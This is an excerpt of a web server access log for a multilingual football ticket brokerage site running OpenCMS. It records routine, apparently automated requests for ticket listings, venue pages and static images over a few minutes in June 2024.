47.128.48.174 - - [28/Jun/2024:00:59:50 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
185.197.222.42 - - [28/Jun/2024:00:59:50 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=E9DB3A42-82BF-9B65-3ED4-EE5A32871388 HTTP/1.1" 200 108205
185.197.222.42 - - [28/Jun/2024:00:59:50 +0200] "GET /ticket2/opencms/img/icons/dk.png HTTP/1.1" 304 -
185.197.222.42 - - [28/Jun/2024:00:59:50 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/images/ui-bg_flat_75_ffffff_40x100.png HTTP/1.1" 404 -
47.128.48.174 - - [28/Jun/2024:00:59:50 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
185.197.222.42 - - [28/Jun/2024:00:59:50 +0200] "GET /ticket2/opencms/img/icons/es.png HTTP/1.1" 304 -
185.197.222.42 - - [28/Jun/2024:00:59:50 +0200] "GET /ticket2/opencms/no/ask-form.html HTTP/1.1" 200 2919
185.197.222.42 - - [28/Jun/2024:00:59:50 +0200] "GET /ticket2/opencms/venue/emirates_stadium.png HTTP/1.1" 200 53537
23.22.35.162 - - [28/Jun/2024:00:59:50 +0200] "GET /ticket2/opencms/nl/buy/?edid=7033050D-85C3-41FB-B689-BE06FAE6772D&page=1 HTTP/1.1" 200 110481
47.128.48.174 - - [28/Jun/2024:00:59:51 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.48.174 - - [28/Jun/2024:00:59:51 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.48.174 - - [28/Jun/2024:00:59:51 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.48.174 - - [28/Jun/2024:00:59:51 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
185.197.222.42 - - [28/Jun/2024:00:59:51 +0200] "GET /ticket2/opencms/img/icons/fi.png HTTP/1.1" 304 -
185.197.222.42 - - [28/Jun/2024:00:59:51 +0200] "GET /ticket2/opencms/img/icons/de.png HTTP/1.1" 304 -
185.197.222.42 - - [28/Jun/2024:00:59:51 +0200] "GET /ticket2/opencms/img/arrow-down.png HTTP/1.1" 304 -
47.128.48.174 - - [28/Jun/2024:00:59:52 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
124.243.133.84 - - [28/Jun/2024:00:59:53 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/bundesliga/eintracht_frankfurt/ HTTP/1.1" 200 73083
3.224.220.101 - - [28/Jun/2024:00:59:54 +0200] "GET /ticket2/opencms/nl/buy/?edid=750C6040-29F7-425D-A24F-51B977F415A3&page=1 HTTP/1.1" 200 111130
94.23.7.188 - - [28/Jun/2024:00:59:58 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=57459A80-66BC-2154-84E8-27032EAB09A5&sortorder=desc&column=price HTTP/1.1" 200 89305
23.22.35.162 - - [28/Jun/2024:00:59:58 +0200] "GET /ticket2/opencms/nl/buy/?edid=DCF22239-47F2-2282-C13B-85FCE1D7C913&page=1 HTTP/1.1" 200 111127
5.9.55.228 - - [28/Jun/2024:01:00:00 +0200] "GET /ticket2/opencms/en/venue/?countryid=AD4C6C1F-4EA2-1827-F34A-F0A47DB58003 HTTP/1.1" 200 100730
94.23.7.188 - - [28/Jun/2024:01:00:02 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=57459A80-66BC-2154-84E8-27032EAB09A5&sortorder=desc&column=row HTTP/1.1" 200 89305
52.70.240.171 - - [28/Jun/2024:01:00:04 +0200] "GET /ticket2/opencms/nl/buy/?edid=8085E80D-BC8F-CDCF-7CC8-2F497FE082D3&page=1 HTTP/1.1" 200 111130
66.249.75.168 - - [28/Jun/2024:01:00:05 +0200] "GET /ticket2/opencms/dk/sport/fodboldbilletter/premier-league/arsenal/ HTTP/1.1" 200 84110
52.70.240.171 - - [28/Jun/2024:01:00:07 +0200] "GET /ticket2/opencms/nl/buy/?edid=E1CACBEB-5FB5-F359-D95F-1110648BB53A&page=1 HTTP/1.1" 200 111130
114.119.136.155 - - [28/Jun/2024:01:00:09 +0200] "GET /ticket2/opencms/en/sell/?edid=95536865-B766-6057-C123-70A3D5AA17E0 HTTP/1.1" 302 -
94.23.7.188 - - [28/Jun/2024:01:00:10 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=57459A80-66BC-2154-84E8-27032EAB09A5&sortorder=desc&column=section HTTP/1.1" 200 89305
52.70.240.171 - - [28/Jun/2024:01:00:10 +0200] "GET /ticket2/opencms/nl/buy/?edid=E9DB3A42-82BF-9B65-3ED4-EE5A32871388&page=1 HTTP/1.1" 200 106505
114.119.136.155 - - [28/Jun/2024:01:00:14 +0200] "GET /ticket2/opencms/en/login/?url=/en/sell/ HTTP/1.1" 200 73431
3.224.220.101 - - [28/Jun/2024:01:00:14 +0200] "GET /ticket2/opencms/nl/buy/?edid=B7C31852-4938-05B8-A23C-0248E7A3D5BA&page=1 HTTP/1.1" 200 106499
5.9.55.228 - - [28/Jun/2024:01:00:18 +0200] "GET /ticket2/opencms/en/venue/?countryid=ACBCEDDC-478F-6F5C-046F-A1A55C83F98D HTTP/1.1" 200 106903
23.22.35.162 - - [28/Jun/2024:01:00:19 +0200] "GET /ticket2/opencms/nl/buy/?edid=7C16C78F-F9EE-B2A9-0C9E-990B916B48DD&page=1 HTTP/1.1" 200 111129
94.23.7.188 - - [28/Jun/2024:01:00:21 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=575DEBEF-D2BA-ADFD-CABD-F28043A54D4D&sortorder=asc&column=price HTTP/1.1" 200 88392
52.70.240.171 - - [28/Jun/2024:01:00:22 +0200] "GET /ticket2/opencms/nl/buy/?edid=71FF0DDB-994C-2EA5-7C18-3DECE9AE5101&page=1 HTTP/1.1" 200 112990
66.249.72.34 - - [28/Jun/2024:01:00:26 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=FD4DCA3B-ED43-1043-8648-63C229A27832 HTTP/1.1" 200 116099
216.244.66.238 - - [28/Jun/2024:01:00:26 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
3.224.220.101 - - [28/Jun/2024:01:00:27 +0200] "GET /ticket2/opencms/nl/buy/?edid=CCC52869-7D07-37D3-E716-0EF1AC21BCE4&page=1 HTTP/1.1" 200 109975
216.244.66.238 - - [28/Jun/2024:01:00:27 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
52.167.144.223 - - [28/Jun/2024:01:00:28 +0200] "GET /ticket2/opencms/dk/sport/fodboldbilletter/champions_league/ HTTP/1.1" 200 78181
3.224.220.101 - - [28/Jun/2024:01:00:31 +0200] "GET /ticket2/opencms/nl/buy/?edid=F75A8704-39CC-1233-9E9B-2121B4DFC51E&page=1 HTTP/1.1" 200 112993
94.23.7.188 - - [28/Jun/2024:01:00:33 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=575DEBEF-D2BA-ADFD-CABD-F28043A54D4D&sortorder=asc&column=row HTTP/1.1" 200 88392
5.9.55.228 - - [28/Jun/2024:01:00:34 +0200] "GET /ticket2/opencms/en/venue/?countryid=ACB5B4FC-B2E3-1024-DD30-02CD725AE8FE HTTP/1.1" 200 100730
3.224.220.101 - - [28/Jun/2024:01:00:34 +0200] "GET /ticket2/opencms/nl/buy/?edid=1BDA6D08-38AF-6470-7423-555F9C3DEC73&page=1 HTTP/1.1" 200 117577
3.224.220.101 - - [28/Jun/2024:01:00:38 +0200] "GET /ticket2/opencms/nl/buy/?edid=42C5D83C-45F5-510D-23C9-7B4CE8796C8F&page=1 HTTP/1.1" 200 112994
47.128.116.249 - - [28/Jun/2024:01:00:40 +0200] "GET /ticket2/opencms/fr/magazine/article?title=manchester-city-remporte-la-premier-league HTTP/1.1" 200 73793
47.128.116.249 - - [28/Jun/2024:01:00:41 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.116.249 - - [28/Jun/2024:01:00:42 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.116.249 - - [28/Jun/2024:01:00:42 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.116.249 - - [28/Jun/2024:01:00:42 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.116.249 - - [28/Jun/2024:01:00:42 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.116.249 - - [28/Jun/2024:01:00:42 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.116.249 - - [28/Jun/2024:01:00:42 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
3.224.220.101 - - [28/Jun/2024:01:00:43 +0200] "GET /ticket2/opencms/nl/buy/?edid=ADD1F57C-36B4-39D2-9578-BA2614FAFC35&page=1 HTTP/1.1" 200 112997
94.23.7.188 - - [28/Jun/2024:01:00:44 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=575DEBEF-D2BA-ADFD-CABD-F28043A54D4D&sortorder=desc&column=row HTTP/1.1" 200 88391
52.70.240.171 - - [28/Jun/2024:01:00:46 +0200] "GET /ticket2/opencms/nl/buy/?edid=BE6ABBE8-6DAC-6741-AA1A-CEB7A9B0DCF0&page=1 HTTP/1.1" 200 112990
52.70.240.171 - - [28/Jun/2024:01:00:51 +0200] "GET /ticket2/opencms/nl/buy/?edid=6B1BC3D5-41D5-1130-8508-F118D3CA5AB9&page=1 HTTP/1.1" 200 112996
5.9.55.228 - - [28/Jun/2024:01:00:52 +0200] "GET /ticket2/opencms/en/venue/?countryid=ACAFFD14-DCE8-EFC6-6ECA-AF006BA900C4 HTTP/1.1" 200 100730
23.22.35.162 - - [28/Jun/2024:01:00:54 +0200] "GET /ticket2/opencms/nl/buy/?edid=66C22035-E7EA-E10A-4BFC-2C30733037DC&page=1 HTTP/1.1" 200 111022
94.23.7.188 - - [28/Jun/2024:01:00:58 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=58E0EA9F-5113-F95E-0A9C-BE7061E53A8B&sortorder=asc&column=price HTTP/1.1" 200 88831
216.245.221.83 - - [28/Jun/2024:01:00:59 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
52.70.240.171 - - [28/Jun/2024:01:00:59 +0200] "GET /ticket2/opencms/nl/buy/?edid=DD14CC82-883B-BD06-4306-EBD494AA1804&page=1 HTTP/1.1" 200 111014
52.70.240.171 - - [28/Jun/2024:01:01:02 +0200] "GET /ticket2/opencms/nl/buy/?edid=7F2B1FEA-20FE-7448-32AC-111154CA401B&page=1 HTTP/1.1" 200 111010
94.23.7.188 - - [28/Jun/2024:01:01:03 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=58E0EA9F-5113-F95E-0A9C-BE7061E53A8B&sortorder=asc&column=row HTTP/1.1" 200 88831
216.245.221.83 - - [28/Jun/2024:01:01:03 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
23.22.35.162 - - [28/Jun/2024:01:01:07 +0200] "GET /ticket2/opencms/nl/buy/?edid=10597F35-2AC7-31D2-FB61-15A36BB6D73B&page=1 HTTP/1.1" 200 111010
5.9.55.228 - - [28/Jun/2024:01:01:08 +0200] "GET /ticket2/opencms/en/venue/?countryid=AC4C45B6-62CE-9E4E-735C-3EDAF240E46F HTTP/1.1" 200 100730
3.224.220.101 - - [28/Jun/2024:01:01:11 +0200] "GET /ticket2/opencms/nl/buy/?edid=68B485F7-9483-6E4F-656D-602EE2AC621D&page=1 HTTP/1.1" 200 111013
52.70.240.171 - - [28/Jun/2024:01:01:15 +0200] "GET /ticket2/opencms/nl/buy/?edid=B089B4B8-933D-AB70-BE65-2A133877E5AC&page=1 HTTP/1.1" 200 111012
94.23.7.188 - - [28/Jun/2024:01:01:16 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=58E0EA9F-5113-F95E-0A9C-BE7061E53A8B&sortorder=asc&column=section HTTP/1.1" 200 88831
3.224.220.101 - - [28/Jun/2024:01:01:18 +0200] "GET /ticket2/opencms/nl/buy/?edid=8F340A1C-D664-7FDD-8257-FE31525DAB7C&page=1 HTTP/1.1" 200 111014
23.22.35.162 - - [28/Jun/2024:01:01:23 +0200] "GET /ticket2/opencms/nl/buy/?edid=F8A721FB-6959-3E3B-0E9C-2BF5336E70F2&page=1 HTTP/1.1" 200 111011
5.9.55.228 - - [28/Jun/2024:01:01:25 +0200] "GET /ticket2/opencms/en/venue/?countryid=ABC76395-F87D-C1C2-D371-A569066C3F43 HTTP/1.1" 200 100730
52.70.240.171 - - [28/Jun/2024:01:01:27 +0200] "GET /ticket2/opencms/nl/buy/?edid=8E8E9404-172C-6C57-7F68-EAFC3F95D1AC&page=1 HTTP/1.1" 200 111016
207.46.13.54 - - [28/Jun/2024:01:01:27 +0200] "GET /ticket2/opencms/sv/magazine/article?title=andra-plats-andra-aret-i-rad HTTP/1.1" 200 73981
94.23.7.188 - - [28/Jun/2024:01:01:30 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5A53D059-2717-7212-ED4E-000015E5862F HTTP/1.1" 200 89113
23.22.35.162 - - [28/Jun/2024:01:01:31 +0200] "GET /ticket2/opencms/nl/buy/?edid=063774E2-DE1A-6A46-E97B-D379290B879E&page=1 HTTP/1.1" 200 111014
47.128.115.108 - - [28/Jun/2024:01:01:31 +0200] "GET /ticket2/opencms/no/buy/?catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 242432
47.128.115.108 - - [28/Jun/2024:01:01:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.115.108 - - [28/Jun/2024:01:01:33 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.115.108 - - [28/Jun/2024:01:01:33 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.115.108 - - [28/Jun/2024:01:01:34 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.115.108 - - [28/Jun/2024:01:01:34 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.115.108 - - [28/Jun/2024:01:01:34 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.115.108 - - [28/Jun/2024:01:01:34 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
94.23.7.188 - - [28/Jun/2024:01:01:34 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5A53D059-2717-7212-ED4E-000015E5862F&sortorder=asc&column=price HTTP/1.1" 200 89149
3.224.220.101 - - [28/Jun/2024:01:01:34 +0200] "GET /ticket2/opencms/nl/buy/?edid=56062CAE-66F5-81C7-DD42-F372CD5AE180&page=1 HTTP/1.1" 200 111009
52.70.240.171 - - [28/Jun/2024:01:01:39 +0200] "GET /ticket2/opencms/nl/buy/?edid=4660DE29-C3F1-FFBE-5E6B-4C74E874EC91&page=1 HTTP/1.1" 200 111012
5.9.55.228 - - [28/Jun/2024:01:01:40 +0200] "GET /ticket2/opencms/en/venue/?countryid=A95940B8-9D24-555E-8502-7702CF57B799 HTTP/1.1" 200 100730
94.23.7.188 - - [28/Jun/2024:01:01:43 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5A53D059-2717-7212-ED4E-000015E5862F&sortorder=asc&column=section HTTP/1.1" 200 89149
3.224.220.101 - - [28/Jun/2024:01:01:43 +0200] "GET /ticket2/opencms/nl/buy/?edid=C8E47E46-ADCD-586A-7BE4-CF1C96256B2D&page=1 HTTP/1.1" 200 111014
3.224.220.101 - - [28/Jun/2024:01:01:46 +0200] "GET /ticket2/opencms/nl/buy/?edid=159AEE85-969E-7453-4999-69FCFD2915E6&page=1 HTTP/1.1" 200 115587
66.249.75.168 - - [28/Jun/2024:01:01:50 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=2C2E9185-38A8-EBBD-403B-609372D69EE0 HTTP/1.1" 200 111323
23.22.35.162 - - [28/Jun/2024:01:01:50 +0200] "GET /ticket2/opencms/nl/buy/?edid=DA2AFD28-6AA1-4222-20E5-CCCE4BF9B981&page=1 HTTP/1.1" 200 111012
5.9.55.228 - - [28/Jun/2024:01:01:54 +0200] "GET /ticket2/opencms/en/venue/?countryid=A9198A40-C385-3F3F-F1E3-C36DF8CBA8BE HTTP/1.1" 200 100730
3.224.220.101 - - [28/Jun/2024:01:01:55 +0200] "GET /ticket2/opencms/nl/buy/?edid=F0845893-AB25-79ED-E273-8681A31846EB&page=1 HTTP/1.1" 200 112807
94.23.7.188 - - [28/Jun/2024:01:01:56 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5AE328E9-BC28-8356-003B-BE36705920C7&sortorder=asc&column=price HTTP/1.1" 200 88611
3.224.220.101 - - [28/Jun/2024:01:01:58 +0200] "GET /ticket2/opencms/nl/buy/?edid=38A9CF02-8181-1667-78E4-4388829901BC&page=1 HTTP/1.1" 200 111011
23.22.35.162 - - [28/Jun/2024:01:02:02 +0200] "GET /ticket2/opencms/nl/buy/?edid=72E82760-BEC3-3CF9-6E90-2FDD50852364&page=1 HTTP/1.1" 200 111017
47.128.116.60 - - [28/Jun/2024:01:02:03 +0200] "GET /ticket2/opencms/fi/buy/?edid=71FF0DDB-994C-2EA5-7C18-3DECE9AE5101 HTTP/1.1" 200 73261
47.128.116.60 - - [28/Jun/2024:01:02:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.116.60 - - [28/Jun/2024:01:02:04 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.116.60 - - [28/Jun/2024:01:02:05 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.116.60 - - [28/Jun/2024:01:02:05 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.116.60 - - [28/Jun/2024:01:02:05 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.116.60 - - [28/Jun/2024:01:02:05 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.116.60 - - [28/Jun/2024:01:02:05 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
23.22.35.162 - - [28/Jun/2024:01:02:07 +0200] "GET /ticket2/opencms/nl/buy/?edid=6749402D-C332-2C4D-9191-3C983EDD528C&page=1 HTTP/1.1" 200 111018
94.23.7.188 - - [28/Jun/2024:01:02:09 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5AE328E9-BC28-8356-003B-BE36705920C7&sortorder=asc&column=row HTTP/1.1" 200 88611
3.224.220.101 - - [28/Jun/2024:01:02:10 +0200] "GET /ticket2/opencms/nl/buy/?edid=039D4473-D662-2ED5-D620-F30FCE116F43&page=1 HTTP/1.1" 200 87013
5.9.55.228 - - [28/Jun/2024:01:02:11 +0200] "GET /ticket2/opencms/en/venue/?countryid=A758EE03-9751-87FA-5392-033D41724B17 HTTP/1.1" 200 100730
3.224.220.101 - - [28/Jun/2024:01:02:14 +0200] "GET /ticket2/opencms/nl/buy/?edid=2E10707D-C051-6138-1E62-3BA0A6C4D8EB&page=1 HTTP/1.1" 200 110280
52.70.240.171 - - [28/Jun/2024:01:02:18 +0200] "GET /ticket2/opencms/nl/buy/?edid=A27091AD-1422-96A9-33A7-74A8DECA25F3&page=1 HTTP/1.1" 200 110268
23.22.35.162 - - [28/Jun/2024:01:02:23 +0200] "GET /ticket2/opencms/nl/buy/?edid=D96122AD-C3AA-80F5-DDA8-935E03AE952D&page=1 HTTP/1.1" 200 110260
47.128.125.179 - - [28/Jun/2024:01:02:24 +0200] "GET /ticket2/opencms/fi/urheilu/jalkapallo/la-liga/cadiz/ HTTP/1.1" 200 74713
3.224.220.101 - - [28/Jun/2024:01:02:26 +0200] "GET /ticket2/opencms/nl/buy/?edid=F26F7624-B3C7-3F2B-5F3B-CAEEB7F1CB7F&page=1 HTTP/1.1" 200 110281
47.128.125.179 - - [28/Jun/2024:01:02:26 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.125.179 - - [28/Jun/2024:01:02:27 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/banners/sv/la_liga_sv.png HTTP/1.1" 200 13455
47.128.125.179 - - [28/Jun/2024:01:02:27 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.125.179 - - [28/Jun/2024:01:02:27 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
5.9.55.228 - - [28/Jun/2024:01:02:27 +0200] "GET /ticket2/opencms/en/venue/?countryid=A6670E01-CE49-A608-C597-250C3D48D088 HTTP/1.1" 200 100730
47.128.125.179 - - [28/Jun/2024:01:02:27 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.125.179 - - [28/Jun/2024:01:02:28 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.125.179 - - [28/Jun/2024:01:02:28 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.125.179 - - [28/Jun/2024:01:02:28 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
94.23.7.188 - - [28/Jun/2024:01:02:30 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5AE328E9-BC28-8356-003B-BE36705920C7&sortorder=asc&column=section HTTP/1.1" 200 88611
52.70.240.171 - - [28/Jun/2024:01:02:31 +0200] "GET /ticket2/opencms/nl/buy/?edid=F2BB5427-1D4A-AECD-9787-90D94712CD18&page=1 HTTP/1.1" 200 110270
3.224.220.101 - - [28/Jun/2024:01:02:35 +0200] "GET /ticket2/opencms/nl/buy/?edid=C4141B0C-454E-2CA8-556F-909E6DA54D22&page=1 HTTP/1.1" 200 110287
23.22.35.162 - - [28/Jun/2024:01:02:39 +0200] "GET /ticket2/opencms/nl/buy/?edid=5CB80305-FAB3-0B17-6A63-E12060ABE282&page=1 HTTP/1.1" 200 110282
94.23.7.188 - - [28/Jun/2024:01:02:40 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5AFDDBF9-845C-BB5D-55AC-602C3BF913C8&sortorder=asc&column=price HTTP/1.1" 200 87556
3.224.220.101 - - [28/Jun/2024:01:02:43 +0200] "GET /ticket2/opencms/nl/buy/?edid=6148B729-620A-0104-5C35-7B49F49164F4&page=1 HTTP/1.1" 200 110284
5.9.55.228 - - [28/Jun/2024:01:02:44 +0200] "GET /ticket2/opencms/en/venue/?countryid=A4DD8A66-89A9-9256-5B01-F5C6EA7FFD86 HTTP/1.1" 200 101417
52.70.240.171 - - [28/Jun/2024:01:02:46 +0200] "GET /ticket2/opencms/nl/buy/?edid=D582FDF1-C885-7FD8-841B-6D2DEF5C38A4&page=1 HTTP/1.1" 200 110283
52.70.240.171 - - [28/Jun/2024:01:02:51 +0200] "GET /ticket2/opencms/nl/buy/?edid=B7E87373-4E91-4192-46CD-A0665726782B&page=1 HTTP/1.1" 200 110280
66.249.76.133 - - [28/Jun/2024:01:02:51 +0200] "GET /ticket2/opencms/dk/buy/?page=1&edid=F6626DB9-CF49-C060-B5A0-E4907286C489 HTTP/1.1" 200 85740
94.23.7.188 - - [28/Jun/2024:01:02:52 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5AFDDBF9-845C-BB5D-55AC-602C3BF913C8&sortorder=asc&column=row HTTP/1.1" 200 87556
23.22.35.162 - - [28/Jun/2024:01:02:55 +0200] "GET /ticket2/opencms/nl/buy/?edid=4DF0D9FC-63B4-BC0C-C1C6-5A8F2E684398&page=1 HTTP/1.1" 200 110278
3.224.220.101 - - [28/Jun/2024:01:02:58 +0200] "GET /ticket2/opencms/nl/buy/?edid=C51DC9BA-8ED0-8D5F-A005-77B2B61DA7C9&page=1 HTTP/1.1" 200 110286
5.9.55.228 - - [28/Jun/2024:01:03:01 +0200] "GET /ticket2/opencms/en/venue/?countryid=A41A8692-50A8-E04F-AB0B-A9766CB2286D HTTP/1.1" 200 100730
52.70.240.171 - - [28/Jun/2024:01:03:02 +0200] "GET /ticket2/opencms/nl/buy/?edid=F1EEEC67-D1C4-E916-20F3-F210A97B2C57&page=1 HTTP/1.1" 200 110282
52.70.240.171 - - [28/Jun/2024:01:03:06 +0200] "GET /ticket2/opencms/nl/buy/?edid=B98837D3-1E81-8A8C-D0BB-1E445F8B9795&page=1 HTTP/1.1" 200 110279
94.23.7.188 - - [28/Jun/2024:01:03:09 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5BB2CDD4-9898-4E12-65F3-4ADBD5A99EE7&sortorder=desc&column=row HTTP/1.1" 200 87742
23.22.35.162 - - [28/Jun/2024:01:03:10 +0200] "GET /ticket2/opencms/nl/buy/?edid=FAFAF417-5A49-5A69-2A7B-18E4D12B5078&page=1 HTTP/1.1" 200 110282
47.128.125.184 - - [28/Jun/2024:01:03:13 +0200] "GET /ticket2/opencms/de/standard/ HTTP/1.1" 500 -
52.70.240.171 - - [28/Jun/2024:01:03:15 +0200] "GET /ticket2/opencms/nl/buy/?edid=BA6A690A-3E4C-7B0E-F103-AC3CC3F63074&page=1 HTTP/1.1" 200 110287
5.9.55.228 - - [28/Jun/2024:01:03:17 +0200] "GET /ticket2/opencms/en/venue/?countryid=A3B02FE6-E314-D205-EF34-B3751539C7A7 HTTP/1.1" 200 100730
23.22.35.162 - - [28/Jun/2024:01:03:19 +0200] "GET /ticket2/opencms/nl/buy/?edid=45F6B2AD-17A6-3A66-C509-85761B6A5E9A&page=1 HTTP/1.1" 200 110284
3.224.220.101 - - [28/Jun/2024:01:03:23 +0200] "GET /ticket2/opencms/nl/buy/?edid=848957BE-8671-4A4D-3A5C-F9117B76047A&page=1 HTTP/1.1" 200 110281
94.23.7.188 - - [28/Jun/2024:01:03:25 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5BB515D6-4A71-F83B-2070-837601175DFA&sortorder=asc&column=price HTTP/1.1" 200 87519
23.22.35.162 - - [28/Jun/2024:01:03:26 +0200] "GET /ticket2/opencms/nl/buy/?edid=F2971CC3-8714-3DC4-0355-85018375B4CB&page=1 HTTP/1.1" 200 84811
23.22.35.162 - - [28/Jun/2024:01:03:30 +0200] "GET /ticket2/opencms/nl/buy/?edid=37E2A4DD-118F-C378-83A2-20232412AB9C&page=1 HTTP/1.1" 200 84814
5.9.55.228 - - [28/Jun/2024:01:03:33 +0200] "GET /ticket2/opencms/en/venue/?countryid=A2F220AE-4AF1-2377-6B91-A90A18E35FA2 HTTP/1.1" 200 100730
52.70.240.171 - - [28/Jun/2024:01:03:35 +0200] "GET /ticket2/opencms/nl/buy/?edid=4D0E8B6F-4A4C-13EE-EC78-4C4A42CB13B0&page=1 HTTP/1.1" 200 84813
